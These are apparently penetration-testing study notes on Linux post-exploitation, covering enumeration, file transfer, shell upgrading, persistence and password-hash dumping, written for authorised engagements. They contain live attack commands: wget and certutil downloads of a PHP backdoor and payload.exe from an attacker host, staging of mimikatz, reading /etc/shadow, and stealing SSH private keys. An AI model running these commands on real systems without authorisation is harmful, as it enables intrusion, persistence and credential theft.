🗒️ Post-Exploitation is the final phase of interaction with a target during a pentest. Using various attacking techniques, the pentester determines the value of the compromised system and keeps control of it for future usage, depending on the kind of access and the stealthiness he must have.It is what the pentester does after the initial foothold and the techniques depends on the target characteristics (operating system, infrastructure).
- The techniques must follow the Rules of Engagement agreed upon with the client before the penetration test, based on the company infrastructure and services.
❗Necessary permissions are required to conduct post-exploitation techniques like modifying services, system configuration, logs deletion, perform privilege escalation.
- Local Enumeration
- Transferring Files
- Upgrading Shells
- Privilege Escalation
- Persistence
- Dumping & Cracking Hashes
- Pivoting
- Clearing Tracks
The post-exploitation process repeats itself after pivoting to another new target.
{% content-ref url="broken-reference" %} Broken link {% endcontent-ref %}
- Hostname
- Distribution & release version
- Kernel version & Architecture
- CPU information
- Disk & mounted drives
- Installed packages
# MSF Meterpreter
getuid #uid = 0 => root
sysinfo
ifconfig
netstat
route
arp
ps
pgrep vsftpd
# Linux SHELL - run 'shell' in Meterpreter
## System
/bin/bash -i
cd /root
hostname
cat /etc/*issue
cat /etc/*release #info about OS release
lsb_release -a #info about OS release
uname -a #Info about kernel and OS architecture
dpkg -l #list of all packets installed
env
lscpu
free -h
df -h
lsblk | grep sd- Current user & privileges
- Other users
- Groups
## Users
whoami
ls -lah /home
cat /etc/passwd #users and services accounts
cat /etc/passwd | grep -v /nologin #users accounts
cat /etc/passwd | grep -v /nologin | cut -d ":" -f 1 #users accounts (only names)
groups <USER>
groups root
groups
who
w
last
lastlog- IP address & network adapter
- Internal networks and other hosts on the network
- TCP/UDP services + ports
- Running services
- Scheduled Cron Jobs
## Network
ifconfig
ip -br -c a
ip a
cat /etc/networks
cat /etc/hostname
cat /etc/hosts
cat /etc/resolv.conf
arp -a
netstat -a #shows all listening ports and established connections.
netstat -at or netstat -au #can also be used to list TCP or UDP protocols respectively.
netstat -l #list ports in “listening” mode. These ports are open and ready to accept
#incoming connections. This can be used with the “t” option to list only ports that
#are listening using the TCP protocol.
netstat -s #list network usage statistics by protocol. #This can also be used
#with the -t or -u options to limit the output to a specific protocol.
netstat -tp #list connections with the service name and PID information.
#This can also be used with the -l option to list listening ports.
netstat -i #shows interface statistics. We see below that “eth0” and “tun0” are more active than “tun1”.
netstat -ano #which could be broken down as follows: #-a: Display all sockets; n: Do not resolve names; o: Display timers
netstat -ant #list of connections with protocal, receiver, sender, local address, foreign address and state
## Services
ps
ps aux
ps aux | grep msfconsole
ps aux | grep root #root processes in execution
top
cat /etc/cron*
crontab -l #list of crontabsSearching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in “find” command is useful and worth keeping in your arsenal.
Below are some useful examples for the “find” command.
Find files:
find . -name flag1.txt: find the file named “flag1.txt” in the current directoryfind /home -name flag1.txt: find the file names “flag1.txt” in the /home directoryfind / -type d -name config: find the directory named config under “/”find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)find / -perm a=x: find executable filesfind /home -user frank: find all files for user “frank” under “/home”find / -mtime 10: find files that were modified in the last 10 daysfind / -atime 10: find files that were accessed in the last 10 dayfind / -cmin -60: find files changed within the last hour (60 minutes)find / -amin -60: find files accesses within the last hour (60 minutes)find / -size 50M: find files with a 50 MB size
This command can also be used with (+) and (-) signs to specify a file that is larger or smaller than the given size.
The example above returns files that are larger than 100 MB. It is important to note that the “find” command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use the “find” command with “-type f 2>/dev/null” to redirect errors to “/dev/null” and have a cleaner output.
Folders and files that can be written to or executed from:
find / -writable -type d 2>/dev/null: Find world-writeable foldersfind / -perm -222 -type d 2>/dev/null: Find world-writeable foldersfind / -perm -o w -type d 2>/dev/null: Find world-writeable folders
The reason we see three different “find” commands that could potentially lead to the same result can be seen in the manual document. As you can see below, the perm parameter affects the way “find” works.
find / -perm -o x -type d 2>/dev/null: Find world-executable folders
Find development tools and supported languages:
find / -name perl*find / -name python*find / -name gcc*
Find specific file permissions:
Below is a short example used to find files that have the SUID bit set. The SUID bit allows the file to run with the privilege level of the account that owns it, rather than the account which runs it.
This allows for an interesting privilege escalation path,we will see in more details on task 6.
The example below is given to complete the subject on the “find” command.
find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.
The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules. It is very useful to be time efficient.Tools:
# Metasploit
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm
# LINENUM - Automatic Enumeration
cd /tmp
upload LinEnum.sh #or copy and paste github code into an .sh file
shell
/bin/bash -i
chmod +x LinEnum.sh
./LinEnum.sh
#can be useful transferring LinEnum.sh to target system (using python -m SimpleHTTPServer on attacker machine and downloading it on victim machine with wget http://target_IP:8000/LinEnum.sh)
./LinEnum.sh -s -k <keyword> -r <report> -e /tmp/ -tPython modules can be useful for setting up a web server that hosts the files required for transfer. These modules
- Check
Pythonversion
python -Vpython3 -Vpy -v # on Windows
-
SimpleHTTPServer-python2module
# If Python version returned is 2.Xpython -m SimpleHTTPServer <PORT_NUMBER>
-
http.server-python3module
# If Python version is 3.Xpython3 -m http.server <PORT># On Windows, trypython -m http.server <PORT>py -3 -m http.server <PORT>e.g.
- Copy a file into the current directory and setup the web server to download the file into the target system
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .# Python 2.7python -m SimpleHTTPServer 80# Python 3.7python3 -m http.server 80
Files can be downloaded from a browser or using a GET request
After exploiting the Linux target, transfer the php-backdoor.php file to the target.
2 terminal sessions are necessary - use tmux utility to get more sessions.
tmux - is a program, terminal multiplexer, which runs in a terminal and allows multiple other terminal programs to be run inside itsudo apt install tmux -y# Attacker machinetmux# ... Exploitation with MSFconsole in Terminal 0 ...# CTRL+B and then C to open a new terminal sessioncd /usr/share/webshells/php/ip -br -c a192.219.50.2python3 -m http.server 80# CTRL+B then 0 (zero) to navigate to the first Terminal session# Target machine/bin/bash -iwget http://192.219.50.2/php-backdoor.phpwget http://<ATTACKER_IP>/php-backdoor.php
Transferring files to Windows
- Set up a web server to host the
payload.exefile
# Attacker machinecd /root/Desktop/ # payload.exe must be herepython3 -m http.server 80
- After gaining access to the Windows target system and spawned a command shell session, download the payload file on the target system using the
certutiltool incmd.
# Windows Target machinecd C:\Tempcertutil -urlcache -f http://<ATTACKER-IP>/payload.exe payload.exe
🔬 Interactive shells techniques are covered in an INE vulnerable Lab. Commands are below, assuming the target SAMBA service is already exploited through the
exploit/linux/samba/is_known_pipenameMSF module.
- After the exploitation (using
MSFconsole,netcat, etc), a non-interactive shell is obtained since it doesn't provide with a prompt- This is a command shell session
Non-interactive Shell
- Display the list of shells on the target system
cat /etc/shells# /etc/shells: valid login shells/bin/sh/bin/dash/bin/bash/bin/rbash/bin/bash -i/bin/sh -i
Spawn TTY Shells
Bash
- Upgrade to a simple
bashorshsession (assumingbashis installed on the target system)
/bin/bash -i/bin/sh -iSHELL=/bin/bash script -q /dev/null# Setup environment variablesexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binexport TERM=xtermexport SHELL=/bin/bash
Python
- From the non-interactive shell session, check
Pythonversion (if present)
python --versionPython 2.7.9
- Spawn a
bashsession withPython. Specified shell must be listed inside/etc/shells
python -c 'import pty; pty.spawn("/bin/bash")'Fully Interactive TTY
- Background (
CTRL+Z) the current remote shell - Update the local terminal line settings with
sttyand bring the remote shell back withfg
stty raw -echo && fg
- Reinitialize the terminal with
reset
reset
📌 For more information on Full TTY Shells check
Perl
perl -h
- Spawn a
bashsession withPerl.
perl -e 'exec "/bin/bash";'
Linux Server SSH service is typically enabled and an attacker can take advantage of it.
- If password login is disabled and key-based authentication is enabled, the attacker can copy a user's
SSHprivate key and use it for future access.
Linux Cron is a service that repeatedly runs Cron jobs that can be used for command execution at a fixed interval and ensure persistent access to the target system.
All the Linux accounts' information is stored in the passwd file stored in /etc/ directory.
Linux has multi-user support, this can increase the overall risk of a server.
cat /etc/passwdPasswords cannot be viewed because they are encrypted and stored in the shadow file in the /etc/ directory.
- 📌 Only
rootaccount can accessshadowfile
sudo cat /etc/shadowAll the Linux accounts' information is stored in the passwd file stored in /etc/ directory.
Linux has multi-user support, this can increase the overall risk of a server.
cat /etc/passwdPasswords cannot be viewed because they are encrypted and stored in the shadow file in the /etc/ directory.
- 📌 Only
rootaccount can accessshadowfile
sudo cat /etc/shadowThe hashed password have a prefix $id value that indicates the type of hashing algorithm that is being used, e.g.:
| Value | Hashing Algorithm |
|---|---|
| $1 | MD5 (easy to crack) |
| $2 | Blowfish (easy to crack) |
| $5 | SHA-256 (difficult to crack) |
| $6 | SHA-512 (difficult to crack) |
| $y | yescrypt |